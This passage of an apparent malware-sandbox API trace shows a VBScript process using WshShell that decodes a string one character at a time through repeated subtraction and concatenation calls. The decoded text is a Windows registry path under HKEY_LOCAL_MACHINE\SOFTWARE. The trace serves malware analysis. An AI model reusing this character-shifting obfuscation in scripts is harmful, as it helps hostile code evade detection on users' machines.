[7]=0x51)), ppvObject=0x28f2c8 | out: ppvObject=0x28f2c8*=0x0) returned 0x80004002 [0084.875] WshShell:IUnknown:QueryInterface (in: This=0x1072de4, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f294 | out: ppvObject=0x28f294*=0x1072dd0) returned 0x0 [0084.875] WshShell:IUnknown:Release (This=0x1072de4) returned 0x1 [0084.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U", lpUsedDefaultChar=0x0) returned 1 [0084.876] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0084.876] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0084.877] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0084.877] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.877] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.878] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0084.878] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0084.878] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.879] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.879] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0084.879] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.880] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.880] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.881] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.881] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.881] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.882] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.882] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0084.883] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.883] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.884] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.884] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0084.884] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0084.885] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.885] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.885] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.886] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.886] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U", lpUsedDefaultChar=0x0) returned 1 [0084.887] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0084.887] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0084.888] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0084.888] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0084.888] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0084.888] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.889] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.889] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.890] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.890] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0084.890] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.891] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.891] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.891] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S", lpUsedDefaultChar=0x0) returned 1 [0084.892] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0084.892] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0084.893] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0084.893] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.893] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.894] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.894] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.894] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0084.895] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.895] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.896] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.896] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.896] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.897] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0084.897] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0084.897] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.898] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.898] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.899] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.899] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.899] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.900] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.900] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.900] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.901] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.901] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.901] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.902] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0084.902] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe4a94c, 